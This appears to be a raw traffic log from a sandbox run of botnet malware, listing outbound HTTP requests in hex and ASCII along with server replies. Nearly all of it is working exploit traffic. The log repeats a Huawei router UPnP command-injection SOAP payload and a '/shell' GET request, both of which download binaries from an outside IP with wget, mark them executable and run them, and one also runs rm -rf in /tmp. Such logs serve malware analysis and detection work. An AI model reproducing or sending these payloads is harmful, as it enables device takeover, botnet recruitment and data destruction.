                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:51.524693966 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            150192.168.2.2355228156.241.121.337215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:35.990854025 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:40.006295919 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:46.153378010 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:58.179667950 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:23.776081085 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            151192.168.2.235908614.199.230.22180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:36.005045891 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:36.317771912 CET554INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 393
                                                            Date: Fri, 26 Jan 2024 14:31:36 GMT
                                                            Server: lighttpd/1.4.59
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 0a 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 0a 20 20 20 20 20 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 54 49 54 4c 45 3e 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 2f 48 45 41 44 3e 0a 20 20 20 20 3c 42 4f 44 59 3e 0a 20 20 20 20 20 20 20 20 3c 48 31 3e 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 20 20 3c 50 52 45 3e 3c 2f 50 52 45 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML lang="en-US" dir="ltr" class="ltr"> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE>404 page not found</TITLE> </HEAD> <BODY> <H1>404 page not found</H1> <PRE></PRE> </BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            152192.168.2.2334746185.92.244.18180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:36.457097054 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:36.659871101 CET483INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:29:36 GMT
                                                            Server: Apache
                                                            Strict-Transport-Security: max-age=63072000;
                                                            X-Content-Type-Options: nosniff
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            153192.168.2.2348752144.196.51.22180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:36.579592943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            154192.168.2.233780266.45.251.8680
                                                            TimestampBytes transferredDirectionData
